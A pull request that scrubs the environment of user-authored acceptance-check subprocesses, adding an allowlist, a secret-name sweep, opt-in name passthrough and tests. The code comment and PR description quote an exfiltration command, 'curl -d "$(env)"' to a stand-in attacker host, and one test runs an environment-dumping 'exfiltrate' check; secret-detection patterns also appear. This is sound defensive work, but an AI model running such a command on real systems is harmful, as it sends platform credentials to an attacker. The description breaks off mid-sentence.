### PR TITLE
fix(security): scrub env for user-authored acceptance-check commands

### DIFF
--- a/packages/agent/src/dto/acceptance-check.dto.ts
+++ b/packages/agent/src/dto/acceptance-check.dto.ts
@@ -1,5 +1,7 @@
 import { Type } from 'class-transformer';
 import {
+    ArrayMaxSize,
+    IsArray,
     IsBoolean,
     IsIn,
     IsInt,
@@ -17,6 +19,7 @@ import {
     type TaskAcceptanceCheck,
     type TaskAcceptanceCheckKind,
 } from '@ever-works/contracts';
+import { ENV_NAME_PATTERN, MAX_ENV_PASSTHROUGH } from '../tasks-domain/check-env';
 
 /**
  * Slug-safe check id: lowercase alphanumeric start, then up to 40 more of
@@ -101,4 +104,21 @@ export class AcceptanceCheckDto implements TaskAcceptanceCheck {
     @IsOptional()
     @IsBoolean()
     disabled?: boolean;
+
+    @ApiPropertyOptional({
+        description:
+            'Environment variable NAMES (never values) granted to this check. Checks run with a scrubbed environment; listing a name is a deliberate grant of that value. Platform-owned configuration (database/auth/trigger/plugin credentials) is never granted, even when listed.',
+        type: [String],
+        maxItems: MAX_ENV_PASSTHROUGH,
+    })
+    @IsOptional()
+    @IsArray()
+    @ArrayMaxSize(MAX_ENV_PASSTHROUGH)
+    @IsString({ each: true })
+    @Matches(ENV_NAME_PATTERN, {
+        each: true,
+        message:
+            'envPassthrough entries must be environment variable NAMES: [A-Za-z_][A-Za-z0-9_]* (values are read from the platform environment).',
+    })
+    envPassthrough?: string[];
 }

--- a/packages/agent/src/tasks-domain/__tests__/check-env.spec.ts
+++ b/packages/agent/src/tasks-domain/__tests__/check-env.spec.ts
@@ -1,0 +1,219 @@
+import {
+    buildCheckEnv,
+    normalizePassthrough,
+    CHECK_ENV_ALLOWLIST,
+    MAX_ENV_PASSTHROUGH,
+} from '../check-env';
+
+/**
+ * Quality gates — the scrubbed environment an acceptance-check subprocess
+ * runs with. A check command is user-authored, so the ONE property that
+ * matters here is that the platform's own secrets never reach it.
+ */
+
+const PLATFORM_ENV: NodeJS.ProcessEnv = {
+    PATH: '/usr/local/bin:/usr/bin:/bin',
+    HOME: '/home/worker',
+    LANG: 'en_US.UTF-8',
+    LC_ALL: 'en_US.UTF-8',
+    TZ: 'UTC',
+    TMPDIR: '/tmp',
+    NODE_ENV: 'production',
+    // …and the platform's crown jewels, all inherited before this fix.
+    DATABASE_URL: 'postgres://user:pw@db/ever',
+    DATABASE_PASSWORD: 'hunter2',
+    PLATFORM_ENCRYPTION_KEY: 'deadbeef',
+    BETTER_AUTH_SECRET: 'auth-secret',
+    AUTH_SECRET: 'auth-secret',
+    TRIGGER_SECRET_KEY: 'tr_secret',
+    TRIGGER_INTERNAL_SECRET: 'internal',
+    PLUGIN_OPENROUTER_API_KEY: 'sk-or-1',
+    STRIPE_SECRET_KEY: 'sk_live_1',
+    SMTP_PASSWORD: 'mail-pw',
+    GH_CLIENT_SECRET: 'gh-secret',
+    SENTRY_DSN: 'https://abc@sentry.io/1',
+};
+
+describe('buildCheckEnv — platform secrets never reach a user-authored check', () => {
+    it('drops every platform secret in the parent environment', () => {
+        const env = buildCheckEnv({ parentEnv: PLATFORM_ENV });
+        for (const leaked of [
+            'DATABASE_URL',
+            'DATABASE_PASSWORD',
+            'PLATFORM_ENCRYPTION_KEY',
+            'BETTER_AUTH_SECRET',
+            'AUTH_SECRET',
+            'TRIGGER_SECRET_KEY',
+            'TRIGGER_INTERNAL_SECRET',
+            'PLUGIN_OPENROUTER_API_KEY',
+            'STRIPE_SECRET_KEY',
+            'SMTP_PASSWORD',
+            'GH_CLIENT_SECRET',
+            'SENTRY_DSN',
+        ]) {
+            expect(env[leaked]).toBeUndefined();
+        }
+        // Not one secret VALUE either, under any name.
+        expect(Object.values(env)).not.toContain('hunter2');
+        expect(Object.values(env)).not.toContain('deadbeef');
+    });
+
+    it('never returns the parent environment, a copy of it, or a spread of it', () => {
+        const env = buildCheckEnv({ parentEnv: PLATFORM_ENV });
+        expect(env).not.toBe(PLATFORM_ENV);
+        expect(Object.keys(env).length).toBeLessThan(Object.keys(PLATFORM_ENV).length);
+    });
+
+    it('keeps what a build/test command legitimately needs (PATH, HOME, locale, TZ, temp)', () => {
+        const env = buildCheckEnv({ parentEnv: PLATFORM_ENV });
+        expect(env.PATH).toBe('/usr/local/bin:/usr/bin:/bin');
+        expect(env.HOME).toBe('/home/worker');
+        expect(env.LANG).toBe('en_US.UTF-8');
+        expect(env.LC_ALL).toBe('en_US.UTF-8');
+        expect(env.TZ).toBe('UTC');
+        expect(env.TMPDIR).toBe('/tmp');
+        expect(env.NODE_ENV).toBe('production');
+    });
+
+    it('marks the run non-interactive with CI=1 when the parent does not', () => {
+        expect(buildCheckEnv({ parentEnv: PLATFORM_ENV }).CI).toBe('1');
+        expect(buildCheckEnv({ parentEnv: { ...PLATFORM_ENV, CI: 'true' } }).CI).toBe('true');
+    });
+
+    it('falls back to a usable PATH/HOME/TMPDIR when the parent has none', () => {
+        const env = buildCheckEnv({ parentEnv: {} });
+        if (process.platform !== 'win32') {
+            expect(env.PATH).toBeTruthy();
+        }
+        expect(env.HOME || env.USERPROFILE).toBeTruthy();
+        expect(env.TMPDIR || env.TEMP || env.TMP).toBeTruthy();
+    });
+
+    it('an explicit envPassthrough name is granted (values read at spawn time)', () => {
+        const env = buildCheckEnv({
+            parentEnv: { ...PLATFORM_ENV, BUILD_FLAVOR: 'nightly' },
+            passthrough: ['BUILD_FLAVOR'],
+        });
+        expect(env.BUILD_FLAVOR).toBe('nightly');
+    });
+
+    it('a granted name that is unset in the parent is simply absent (no empty string)', () => {
+        const env = buildCheckEnv({ parentEnv: PLATFORM_ENV, passthrough: ['NOT_SET_ANYWHERE'] });
+        expect('NOT_SET_ANYWHERE' in env).toBe(false);
+    });
+
+    it('an explicit grant beats the secret-name sweep — that IS the opt-in', () => {
+        const env = buildCheckEnv({
+            parentEnv: { ...PLATFORM_ENV, MY_BUILD_TOKEN: 'grant-me' },
+            passthrough: ['MY_BUILD_TOKEN'],
+        });
+        expect(env.MY_BUILD_TOKEN).toBe('grant-me');
+    });
+
+    it('platform-owned configuration is NOT grantable, even when explicitly listed', () => {
+        const env = buildCheckEnv({
+            parentEnv: PLATFORM_ENV,
+            passthrough: [
+                'PLATFORM_ENCRYPTION_KEY',
+                'DATABASE_URL',
+                'TRIGGER_SECRET_KEY',
+                'PLUGIN_OPENROUTER_API_KEY',
+                'AUTH_SECRET',
+            ],
+        });
+        expect(env.PLATFORM_ENCRYPTION_KEY).toBeUndefined();
+        expect(env.DATABASE_URL).toBeUndefined();
+        expect(env.TRIGGER_SECRET_KEY).toBeUndefined();
+        expect(env.PLUGIN_OPENROUTER_API_KEY).toBeUndefined();
+        expect(env.AUTH_SECRET).toBeUndefined();
+    });
+
+    it('a secret-shaped name is blocked even when the ALLOWLIST carries it (belt and braces)', () => {
+        const env = buildCheckEnv({
+            parentEnv: { ...PLATFORM_ENV, ACME_API_KEY: 'leak', ACME_REGION: 'eu' },
+            // A future/mistaken allowlist widening must not reopen the hole.
+            allowlist: [...CHECK_ENV_ALLOWLIST, 'ACME_API_KEY', 'ACME_REGION'],
+        });
+        expect(env.ACME_API_KEY).toBeUndefined();
+        expect(env.ACME_REGION).toBe('eu');
+    });
+
+    it('strips a credential-bearing URL value from an allowlisted variable', () => {
+        const env = buildCheckEnv({
+            parentEnv: {
+                ...PLATFORM_ENV,
+                HTTPS_PROXY: 'http://bob:s3cr3t@proxy.corp:8080',
+                HTTP_PROXY: 'http://proxy.corp:8080',
+            },
+        });
+        expect(env.HTTPS_PROXY).toBeUndefined();
+        expect(env.HTTP_PROXY).toBe('http://proxy.corp:8080');
+    });
+
+    it('matches parent variables case-insensitively (Windows spells them Path/TEMP)', () => {
+        const env = buildCheckEnv({
+            parentEnv: {
+                Path: 'C:\\Windows\\system32',
+                SystemRoot: 'C:\\Windows',
+                ComSpec: 'C:\\Windows\\system32\\cmd.exe',
+                TEMP: 'C:\\Temp',
+                PATHEXT: '.COM;.EXE;.BAT',
+            },
+        });
+        expect(env.Path).toBe('C:\\Windows\\system32');
+        expect(env.SystemRoot).toBe('C:\\Windows');
+        expect(env.ComSpec).toBe('C:\\Windows\\system32\\cmd.exe');
+        expect(env.TEMP).toBe('C:\\Temp');
+        expect(env.PATHEXT).toBe('.COM;.EXE;.BAT');
+    });
+
+    it('on win32 the real environment yields the vars cmd.exe needs to start', () => {
+        if (process.platform !== 'win32') {
+            expect(true).toBe(true);
+            return;
+        }
+        const env = buildCheckEnv();
+        const upper = new Set(Object.keys(env).map((key) => key.toUpperCase()));
+        expect(upper.has('PATH')).toBe(true);
+        expect(upper.has('SYSTEMROOT')).toBe(true);
+        expect(upper.has('COMSPEC')).toBe(true);
+        expect(upper.has('PATHEXT')).toBe(true);
+    });
+
+    it('defaults to process.env without exposing its secrets to the child', () => {
+        const restore = { ...process.env };
+        process.env.PLATFORM_ENCRYPTION_KEY = 'live-key';
+        process.env.SOME_RANDOM_SECRET = 'live-secret';
+        try {
+            const env = buildCheckEnv();
+            expect(env.PLATFORM_ENCRYPTION_KEY).toBeUndefined();
+            expect(env.SOME_RANDOM_SECRET).toBeUndefined();
+            expect(Object.values(env)).not.toContain('live-key');
+        } finally {
+            process.env = restore;
+        }
+    });
+});
+
+describe('normalizePassthrough', () => {
+    it('ignores malformed names instead of failing the check', () => {
+        expect(
+            normalizePassthrough(['GOOD_NAME', 'has space', 'X=1', '', '9LEADING', null as never]),
+        ).toEqual(['GOOD_NAME']);
+    });
+
+    it('de-duplicates case-insensitively and caps the list', () => {
+        expect(normalizePassthrough(['A_VAR', 'a_var'])).toEqual(['A_VAR']);
+        const many = Array.from({ length: MAX_ENV_PASSTHROUGH + 10 }, (_, i) => `VAR_${i}`);
+        expect(normalizePassthrough(many)).toHaveLength(MAX_ENV_PASSTHROUGH);
+    });
+
+    it('drops platform-owned names before they can ever be looked up', () => {
+        expect(normalizePassthrough(['DATABASE_URL', 'PLUGIN_X', 'MY_VAR'])).toEqual(['MY_VAR']);
+    });
+
+    it('treats a non-array (hand-edited simple-json column) as no grant', () => {
+        expect(normalizePassthrough(undefined)).toEqual([]);
+        expect(normalizePassthrough('DATABASE_URL' as never)).toEqual([]);
+    });
+});

--- a/packages/agent/src/tasks-domain/__tests__/task-gate-runner.service.spec.ts
+++ b/packages/agent/src/tasks-domain/__tests__/task-gate-runner.service.spec.ts
@@ -263,4 +263,113 @@ describe('TaskGateRunnerService.runChecks', () => {
             expect(outcome.results[0].status).toBe('red');
         });
     });
+
+    /**
+     * Environment scrubbing, observed in a REAL child process: the check
+     * command is user-authored, so `env`/`printenv` inside it must not be
+     * able to read the platform's secrets.
+     *
+     * The probes print KEY NAMES plus one sentinel value rather than the
+     * whole `JSON.stringify(process.env)`: `logTail` keeps only the last
+     * ~4KB, and a Windows `PATH` alone can fill that — an absence assertion
+     * over a truncated dump would be worthless.
+     */
+    describe('subprocess environment is scrubbed, never inherited', () => {
+        const SECRET_VALUE = 'ew-gate-secret-do-not-leak';
+        const GRANT_VALUE = 'ew-gate-granted-value';
+        let restoreEnv: NodeJS.ProcessEnv;
+
+        const PRINT_ENV =
+            "node -e \"console.log('KEYS=' + Object.keys(process.env).sort().join(','))" +
+            "; console.log('SENTINEL=' + String(process.env.EW_GATE_TEST_SECRET))" +
+            "; console.log('GRANT=' + String(process.env.EW_GATE_TEST_GRANT))" +
+            "; console.log('DBURL=' + String(process.env.DATABASE_URL))" +
+            "; console.log('ENCKEY=' + String(process.env.PLATFORM_ENCRYPTION_KEY))" +
+            "; console.log('HASPATH=' + (process.env.PATH ? 'yes' : 'no'))" +
+            "; console.log('CI=' + String(process.env.CI))\"";
+
+        beforeEach(() => {
+            restoreEnv = { ...process.env };
+            process.env.EW_GATE_TEST_SECRET = SECRET_VALUE;
+            process.env.EW_GATE_TEST_GRANT = GRANT_VALUE;
+            process.env.DATABASE_URL = `postgres://u:${SECRET_VALUE}@db/ever`;
+            process.env.PLATFORM_ENCRYPTION_KEY = SECRET_VALUE;
+        });
+
+        afterEach(() => {
+            process.env = restoreEnv;
+        });
+
+        const probe = async (overrides: Partial<TaskAcceptanceCheck> = {}) => {
+            const outcome = await runner.runChecks({
+                checks: [check({ id: 'env-probe', command: PRINT_ENV, ...overrides })],
+                cwd: process.cwd(),
+                runId: RUN_ID,
+            });
+            expect(outcome.results[0].status).toBe('green');
+            return outcome.results[0].logTail ?? '';
+        };
+
+        it('a platform secret in the parent env is invisible to the check', async () => {
+            const tail = await probe();
+            expect(tail).toContain('SENTINEL=undefined');
+            expect(tail).toContain('ENCKEY=undefined');
+            expect(tail).toContain('DBURL=undefined');
+            // …and the secret VALUE appears nowhere, under any name.
+            expect(tail).not.toContain(SECRET_VALUE);
+        });
+
+        it('the platform secret NAMES are absent from the child key list', async () => {
+            const keys = (/KEYS=(.*)/.exec(await probe())?.[1] ?? '').split(',');
+            expect(keys).not.toContain('EW_GATE_TEST_SECRET');
+            expect(keys).not.toContain('PLATFORM_ENCRYPTION_KEY');
+            expect(keys).not.toContain('DATABASE_URL');
+        });
+
+        it('PATH survives the scrub, so the check can resolve its commands', async () => {
+            const tail = await probe();
+            // The probe itself is proof: `node` resolved through PATH.
+            expect(tail).toContain('HASPATH=yes');
+        });
+
+        it('runs non-interactive (CI is set) so watch modes cannot hang the gate', async () => {
+            expect(await probe()).not.toContain('CI=undefined');
+        });
+
+        it('an explicit envPassthrough grant reaches the subprocess', async () => {
+            const tail = await probe({ envPassthrough: ['EW_GATE_TEST_GRANT'] });
+            expect(tail).toContain(`GRANT=${GRANT_VALUE}`);
+        });
+
+        it('without the grant the same variable is absent (opt-in, not opt-out)', async () => {
+            expect(await probe()).toContain('GRANT=undefined');
+        });
+
+        it('platform-owned configuration stays refused even when explicitly granted', async () => {
+            const tail = await probe({
+                envPassthrough: ['PLATFORM_ENCRYPTION_KEY', 'DATABASE_URL'],
+            });
+            expect(tail).toContain('ENCKEY=undefined');
+            expect(tail).toContain('DBURL=undefined');
+            expect(tail).not.toContain(SECRET_VALUE);
+        });
+
+        it('a check that greps its own environment finds no platform secret', async () => {
+            const outcome = await runner.runChecks({
+                checks: [
+                    check({
+                        id: 'exfiltrate',
+                        // The attack from the report, verbatim in spirit:
+                        // dump the environment and look for the secret.
+                        command:
+                            "node -e \"var hit = JSON.stringify(process.env).indexOf('ew-gate-secret-do-not-leak'); console.log('HIT=' + hit); process.exit(hit === -1 ? 0 : 9)\"",
+                    }),
+                ],
+                cwd: process.cwd(),
+                runId: RUN_ID,
+            });
+            expect(outcome.results[0]).toMatchObject({ status: 'green', exitCode: 0 });
+            expect(outcome.results[0].logTail).toContain('HIT=-1');
+        });
+    });
 });

--- a/packages/agent/src/tasks-domain/check-env.ts
+++ b/packages/agent/src/tasks-domain/check-env.ts
@@ -1,0 +1,282 @@
+import { homedir, tmpdir } from 'os';
+
+/**
+ * Quality gates — the environment an acceptance-check subprocess runs with.
+ *
+ * SECURITY (why this module exists): a check `command` is user-authored
+ * input (Work members with Task/settings rights write it, and an agent can
+ * propose it), and it is executed through the platform shell in the run's
+ * checkout. Spawning it with the inherited process environment therefore
+ * handed every check `DATABASE_*`, `PLATFORM_ENCRYPTION_KEY`,
+ * `AUTH_SECRET`, `TRIGGER_*`, every plugin API key… — `test: env > out.txt`
+ * or `curl -d "$(env)" attacker` was a complete platform-secret exfiltration
+ * primitive.
+ *
+ * The child env is therefore built FROM SCRATCH:
+ *   1. a fixed allowlist of what a build/test command legitimately needs
+ *      (`PATH`, `HOME`/`USERPROFILE`, locale, temp dirs, the Windows
+ *      essentials, toolchain roots) — read out of the parent env by name;
+ *   2. the check's own `envPassthrough` names — deliberate, per-check
+ *      grants, still refused for platform-owned configuration;
+ *   3. a belt-and-braces sweep that drops any secret-shaped NAME or
+ *      credential-bearing URL value that reached the map WITHOUT being an
+ *      explicit grant, so widening the allowlist can never silently
+ *      reintroduce the leak.
+ *
+ * Same posture as the coding-agent CLI runners' `subprocess-env.ts`
+ * helpers under `packages/plugins` (audit finding C-10).
+ */
+
+/**
+ * Environment variables every check subprocess may see, by name.
+ *
+ * The rule for adding one: it must be needed to RESOLVE AND RUN commands
+ * (interpreter/toolchain discovery, locale, temp space) and must not carry
+ * credentials. Lookups are case-insensitive, so the Windows spellings
+ * (`Path`, `TEMP`) match these entries.
+ */
+export const CHECK_ENV_ALLOWLIST: readonly string[] = [
+    // POSIX essentials
+    'PATH',
+    'HOME',
+    'SHELL',
+    'USER',
+    'LOGNAME',
+    'TERM',
+    'TZ',
+    'TMPDIR',
+    'LANG',
+    'LANGUAGE',
+    'XDG_CACHE_HOME',
+    'XDG_CONFIG_HOME',
+    'XDG_DATA_HOME',
+    // Windows essentials — cmd.exe and most toolchains refuse to start
+    // without these.
+    'SystemRoot',
+    'SystemDrive',
+    'ComSpec',
+    'PATHEXT',
+    'windir',
+    'TEMP',
+    'TMP',
+    'USERPROFILE',
+    'HOMEDRIVE',
+    'HOMEPATH',
+    'APPDATA',
+    'LOCALAPPDATA',
+    'ALLUSERSPROFILE',
+    'PROGRAMDATA',
+    'PROGRAMFILES',
+    'PROGRAMFILES(X86)',
+    'COMMONPROGRAMFILES',
+    'PUBLIC',
+    'USERNAME',
+    'COMPUTERNAME',
+    'NUMBER_OF_PROCESSORS',
+    'PROCESSOR_ARCHITECTURE',
+    'OS',
+    // Runtime / toolchain roots. Locations, not credentials.
+    'NODE_ENV',
+    'NODE_VERSION',
+    'NODE_OPTIONS',
+    'NODE_EXTRA_CA_CERTS',
+    'NVM_DIR',
+    'NVM_BIN',
+    'VOLTA_HOME',
+    'COREPACK_HOME',
+    'PNPM_HOME',
+    'BUN_INSTALL',
+    'JAVA_HOME',
+    'GOPATH',
+    'GOROOT',
+    'CARGO_HOME',
+    'RUSTUP_HOME',
+    'DOTNET_ROOT',
+    'VIRTUAL_ENV',
+    'PYENV_ROOT',
+    // Network plumbing a real build needs behind a proxy / private CA.
+    // Credential-bearing values are stripped by the sweep below.
+    'HTTP_PROXY',
+    'HTTPS_PROXY',
+    'ALL_PROXY',
+    'NO_PROXY',
+    'SSL_CERT_FILE',
+    'SSL_CERT_DIR',
+    'REQUESTS_CA_BUNDLE',
+    'CURL_CA_BUNDLE',
+    // Non-interactive marker; see CHECK_ENV_DEFAULTS.
+    'CI',
+];
+
+/**
+ * Allowlisted NAME PREFIXES. Only the POSIX locale family, whose members
+ * (`LC_ALL`, `LC_CTYPE`, …) are open-ended by design.
+ */
+export const CHECK_ENV_ALLOWED_PREFIXES: readonly string[] = ['LC_'];
+
+/**
+ * Values injected when the parent env does not provide them. `CI=1` is what
+ * a headless gate wants: it turns off watch modes and interactive prompts
+ * that would otherwise hang a check until its timeout.
+ */
+export const CHECK_ENV_DEFAULTS: Readonly<Record<string, string>> = { CI: '1' };
+
+/**
+ * Secret-shaped variable names. Anything matching is dropped from the child
+ * env unless the check named it in `envPassthrough` — belt and braces
+ * against a future allowlist entry (or an injected default) that quietly
+ * carries a credential.
+ */
+export const SECRETISH_ENV_KEY_PATTERN =
+    /(SECRET|TOKEN|KEY|PASSWORD|PASSWD|CREDENTIAL|DSN|DATABASE_URL|CONNECTION)/i;
+
+/**
+ * Platform-owned configuration namespaces. These are NEVER grantable — not
+ * by the allowlist, not by an explicit `envPassthrough` — because they are
+ * the platform's own credentials, not the Work's. Without this, the opt-in
+ * escape hatch would re-open the very hole this module closes
+ * (`envPassthrough: ['PLATFORM_ENCRYPTION_KEY']`).
+ */
+export const PLATFORM_OWNED_ENV_PATTERN =
+    /^(DATABASE_|PLATFORM_|PLUGIN_|TRIGGER_|AUTH_|BETTER_AUTH_|EVER_WORKS_|SMTP_|RESEND_|MAILER_|STRIPE_|SENTRY_|POSTHOG_|JITSU_|TWENTY_CRM_|K8S_|STORAGE_|AWS_|REDIS_|S3_|MINIO_|GH_|GOOGLE_|FACEBOOK_|LINKEDIN_)/i;
+
+/**
+ * Shape a passthrough NAME must have to be honored. Anything else (spaces,
+ * `=`, shell metacharacters, empty) is ignored rather than rejected — a
+ * malformed entry must not fail an otherwise healthy check.
+ */
+export const ENV_NAME_PATTERN = /^[A-Za-z_][A-Za-z0-9_]{0,127}$/;
+
+/** Upper bound on how many names one check may grant. */
+export const MAX_ENV_PASSTHROUGH = 32;
+
+/**
+ * A URL carrying `user:password@` in its authority. Allowlisted values that
+ * look like this (a credentialed proxy URL, typically) are dropped: the
+ * variable is plumbing, the password inside it is not ours to hand over.
+ */
+const CREDENTIALED_URL_PATTERN = /[a-z][a-z0-9+.-]*:\/\/[^/\s@]*:[^/\s@]+@/i;
+
+export interface BuildCheckEnvOptions {
+    /**
+     * Names the check explicitly opted into (`TaskAcceptanceCheck.envPassthrough`).
+     * Names only — values are read from the parent env at spawn time.
+     */
+    passthrough?: readonly string[] | null;
+    /** Environment to select from. Defaults to `process.env`. */
+    parentEnv?: NodeJS.ProcessEnv;
+    /** Allowlist override (tests / future per-runtime tuning). */
+    allowlist?: readonly string[];
+}
+
+/**
+ * Build the environment for one acceptance-check subprocess.
+ *
+ * Never returns the parent environment, a copy of it, or a spread of it —
+ * only the allowlisted names, the explicit grants, and the defaults.
+ */
+export function buildCheckEnv(options: BuildCheckEnvOptions = {}): Record<string, string> {
+    const parentEnv = options.parentEnv ?? process.env;
+    const allowlist = options.allowlist ?? CHECK_ENV_ALLOWLIST;
+
+    // Windows env names are case-insensitive (`Path` vs `PATH`), so index
+    // the parent once by upper-cased name and look everything up through it.
+    const byUpperName = new Map<string, string>();
+    for (const key of Object.keys(parentEnv)) {
+        const upper = key.toUpperCase();
+        if (!byUpperName.has(upper)) byUpperName.set(upper, key);
+    }
+    const readParent = (name: string): { key: string; value: string } | null => {
+        const key = byUpperName.get(name.toUpperCase());
+        if (key === undefined) return null;
+        const value = parentEnv[key];
+        return typeof value === 'string' ? { key, value } : null;
+    };
+
+    const env: Record<string, string> = {};
+
+    // 1. Allowlisted names, then the open-ended locale family.
+    for (const name of allowlist) {
+        const found = readParent(name);
+        if (found && isSafeInheritedValue(found.key, found.value)) {
+            env[found.key] = found.value;
+        }
+    }
+    for (const [upper, key] of byUpperName) {
+        if (!CHECK_ENV_ALLOWED_PREFIXES.some((prefix) => upper.startsWith(prefix.toUpperCase()))) {
+            continue;
+        }
+        const value = parentEnv[key];
+        if (typeof value === 'string' && isSafeInheritedValue(key, value)) {
+            env[key] = value;
+        }
+    }
+
+    // 2. Explicit per-check grants. These bypass the secret-name sweep (a
+    //    listed name IS the grant) but never the platform-owned refusal.
+    for (const name of normalizePassthrough(options.passthrough)) {
+        const found = readParent(name);
+        if (found) env[found.key] = found.value;
+    }
+
+    // 3. Defaults for anything the parent did not supply, plus the PATH
+    //    floor — a check whose commands cannot be resolved is useless.
+    for (const [name, value] of Object.entries(CHECK_ENV_DEFAULTS)) {
+        if (byUpperNameHas(env, name) === false) {
+            env[name] = value;
+        }
+    }
+    // A PATH-less POSIX child cannot resolve `pnpm`/`node` at all; on
+    // Windows an absent PATH is left absent (cmd.exe has its own fallback,
+    // and an empty PATH would be worse than none).
+    if (byUpperNameHas(env, 'PATH') === false && process.platform !== 'win32') {
+        env.PATH = '/usr/local/bin:/usr/bin:/bin';
+    }
+    if (byUpperNameHas(env, 'HOME') === false && byUpperNameHas(env, 'USERPROFILE') === false) {
+        env.HOME = homedir();
+    }
+    if (
+        byUpperNameHas(env, 'TMPDIR') === false &&
+        byUpperNameHas(env, 'TEMP') === false &&
+        byUpperNameHas(env, 'TMP') === false
+    ) {
+        env.TMPDIR = tmpdir();
+    }
+
+    return env;
+}
+
+/**
+ * The names a check actually granted: shape-valid, de-duplicated, capped,
+ * and never platform-owned configuration.
+ */
+export function normalizePassthrough(names: readonly string[] | null | undefined): string[] {
+    if (!Array.isArray(names)) return [];
+    const out: string[] = [];
+    const seen = new Set<string>();
+    for (const raw of names) {
+        if (typeof raw !== 'string') continue;
+        const name = raw.trim();
+        if (!ENV_NAME_PATTERN.test(name)) continue;
+        if (PLATFORM_OWNED_ENV_PATTERN.test(name)) continue;
+        const upper = name.toUpperCase();
+        if (seen.has(upper)) continue;
+        seen.add(upper);
+        out.push(name);
+        if (out.length >= MAX_ENV_PASSTHROUGH) break;
+    }
+    return out;
+}
+
+/** Guard applied to everything that is NOT an explicit grant. */
+function isSafeInheritedValue(name: string, value: string): boolean {
+    if (SECRETISH_ENV_KEY_PATTERN.test(name)) return false;
+    if (PLATFORM_OWNED_ENV_PATTERN.test(name)) return false;
+    return !CREDENTIALED_URL_PATTERN.test(value);
+}
+
+/** Case-insensitive membership test against an env map being built. */
+function byUpperNameHas(env: Record<string, string>, name: string): boolean {
+    const upper = name.toUpperCase();
+    return Object.keys(env).some((key) => key.toUpperCase() === upper);
+}

--- a/packages/agent/src/tasks-domain/index.ts
+++ b/packages/agent/src/tasks-domain/index.ts
@@ -6,6 +6,7 @@ export * from './tasks.module';
 export * from './tasks.service';
 export * from './task-gates';
 export * from './task-gate-runner.service';
+export * from './check-env';
 export * from './task-transition.service';
 export * from './task-chat.service';
 export * from './task-dispatcher';

--- a/packages/agent/src/tasks-domain/task-gate-runner.service.ts
+++ b/packages/agent/src/tasks-domain/task-gate-runner.service.ts
@@ -8,6 +8,7 @@ import type {
     WorkChecksPolicy,
 } from '@ever-works/contracts';
 import { AgentRunRepository } from '../database/repositories/agent-run.repository';
+import { buildCheckEnv } from './check-env';
 
 /** Wall-clock budget applied when a check declares no `timeoutSec`. */
 export const DEFAULT_CHECK_TIMEOUT_SEC = 600;
@@ -143,6 +144,12 @@ export class TaskGateRunnerService {
      * the platform shell. This adds no privilege beyond the status quo:
      * pipeline agents already run arbitrary commands in the same checkout,
      * and only Work members with settings/Task-edit rights author checks.
+     *
+     * The child env is SCRUBBED (`buildCheckEnv`), never inherited: the
+     * command is user-authored, so `env`/`printenv` in a check must not be
+     * able to read the platform's database, auth, Trigger or plugin
+     * credentials. A check that genuinely needs one more variable names it
+     * in `envPassthrough`.
      */
     private executeCheck(check: TaskAcceptanceCheck, rootCwd: string): Promise<TaskCheckResult> {
         const cwd = check.cwd ? join(rootCwd, check.cwd) : rootCwd;
@@ -175,7 +182,12 @@ export class TaskGateRunnerService {
 
             let child: ReturnType<typeof spawn>;
             try {
-                child = spawn(check.command, { cwd, shell: true, windowsHide: true });
+                child = spawn(check.command, {
+                    cwd,
+                    shell: true,
+                    windowsHide: true,
+                    env: buildCheckEnv({ passthrough: check.envPassthrough }),
+                });
             } catch (error) {
                 tail = error instanceof Error ? error.message : String(error);
                 finish('error', null);

--- a/packages/contracts/src/tasks/task-gates.types.ts
+++ b/packages/contracts/src/tasks/task-gates.types.ts
@@ -54,6 +54,23 @@ export interface TaskAcceptanceCheck {
 	/** Required checks decide the gate; non-required ones only report. */
 	required: boolean;
 	/**
+	 * Environment variable NAMES (never values) the check is explicitly
+	 * granted from the platform process environment.
+	 *
+	 * A check command is user-authored input, so its subprocess runs with a
+	 * scrubbed environment built from a fixed allowlist (`PATH`, `HOME`,
+	 * locale/temp vars, …) — it does NOT inherit the platform's own
+	 * environment. This field is the opt-in escape hatch for a build that
+	 * genuinely needs one more variable: listing a name is a DELIBERATE
+	 * GRANT of that value to every command the check runs.
+	 *
+	 * Values are read from the parent environment at spawn time; a name
+	 * that is unset there is simply absent. Platform-owned configuration
+	 * (database/auth/trigger/plugin credentials) is never grantable — see
+	 * `buildCheckEnv` in `@ever-works/agent`. Optional, defaults to none.
+	 */
+	envPassthrough?: string[];
+	/**
 	 * `true` removes the check from the resolved list. On a Task entry
 	 * this is how an inherited Work default is suppressed without
 	 * redeclaring the rest.


### PR DESCRIPTION
## The defect (P0)

`packages/agent/src/tasks-domain/task-gate-runner.service.ts` spawned every
acceptance-check command like this:

```ts
child = spawn(check.command, { cwd, shell: true, windowsHide: true });
```

No `env` option means the child **inherits the entire platform environment**.
A Task's acceptance check is user-authored input — Work members with
Task/settings rights write it, and an agent can propose one — so a check as
innocuous-looking as

```yaml
- id: test
  command: curl -d "$(env)" https://attacker.example
```

exfiltrated `DATABASE_URL` / `DATABASE_PASSWORD`, `PLATFORM_ENCRYPTION_KEY`,
`AUTH_SECRET` / `BETTER_AUTH_SECRET`, `TRIGGER_SECRET_KEY`,
`TRIGGER_INTERNAL_SECRET`, every `PLUGIN_*` provider key, `STRIPE_SECRET_KEY`,
SMTP credentials — the whole worker environment. Same class as audit finding
C-10 (the coding-agent CLI runners), which was fixed for
`claude-code`/`codex`/`gemini`/`opencode`/`hermes-agent` but never for the
gate runner.

## The fix

**1. The child env is built from scratch** — new
`packages/agent/src/tasks-domain/check-env.ts`:

- a fixed **allowlist** of what a build/test command legitimately needs
  (`PATH`, `HOME`/`USERPROFILE`, `SHELL`, `LANG`/`LC_*`, `TZ`,
  `TMPDIR`/`TEMP`/`TMP`, the Windows essentials `SystemRoot`/`ComSpec`/
  `PATHEXT`/`windir`/…, toolchain roots like `NVM_DIR`/`PNPM_HOME`/
  `JAVA_HOME`, proxy/CA plumbing), read out of the parent **by name**;
- lookups are **case-insensitive**, so Windows' `Path`/`TEMP` spellings match;
- `CI=1` is injected when the parent has no `CI` — a headless gate must not
  hang in a watch mode until its timeout;
- `PATH`/`HOME`/`TMPDIR` floors so a check can still resolve its commands.

The parent environment is never spread, copied, or passed through.

**2. Explicit opt-in passthrough** (additive, optional, defaults to none) —
`TaskAcceptanceCheck.envPassthrough?: string[]` in `@ever-works/contracts`,
validated on `AcceptanceCheckDto` (`@IsArray`, `@ArrayMaxSize(32)`,
name-shape `@Matches`). **Names only**; values are read from the parent env at
spawn time. Listing a name is documented as a deliberate grant.

**3. Belt and braces.** Anything that reaches the child env *without* being an
explicit grant is swept: a secret-shaped NAME
